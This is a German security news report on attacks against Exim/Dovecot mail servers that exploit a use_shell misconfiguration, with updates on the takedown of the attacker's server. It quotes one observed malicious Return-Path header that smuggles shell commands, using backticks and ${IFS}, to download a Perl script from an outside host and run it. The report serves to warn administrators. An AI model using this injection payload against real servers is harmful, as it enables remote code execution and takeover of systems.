Angriffe auf Mail-Server Exim/Dovecot
Unbekannte nutzen eine verbreitete Fehlkonfiguration, um mit speziellen Mails Mail-Server zu kapern.
Das Internet Storm Center berichtet über aktuelle Angriffe auf Systeme, bei denen der Mail-Server Exim den IMAP-Server Dovecot für die lokale Zustellung von Mails benutzt.
Bereits im Mai warnte heise Security vor einem verbreiteten Konfigurationsfehler, der dazu führt, dass eine Mail Shell-Befehle auf dem Mail-Server ausführen kann. Das ist möglich, wenn in der Exim-Konfiguration für lokale Mail-Zustellung der Parameter use_shell gesetzt ist, wie eine Zeit lang unter anderem im Dovecot-Wiki vorgeschlagen wurde. Konkret beobachtete ein Leser Mails, die mit einem speziell präparierten Return-Path eingeliefert wurden:
Return-Path: <x`wget${IFS}
-O${IFS}/tmp/p.pl${IFS}
x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>
Der lädt ein kleines Perl-Skript nach, dass dann unter anderem einen einfachen IRC-Server startet. Wer also die Open-Source-Kombination aus Exim und Dovecot einsetzt, tut gut daran, seine Config-Files noch einmal zu checken.
Update 16:15 29.7.: Die eingeschleusten Perl-Skripte sind übrigens immer noch vom Server x.cc.st abrufbar, der laut whois in einem Rechenzentrum in Berlin beheimatet ist. Dessen Betreiber Strato wurde darauf bereits gestern über seine abuse-Mail-Adresse hingewiesen.
Update 17:00 29.7.:Strato hat den Server jetzt still gelegt.
(ju)
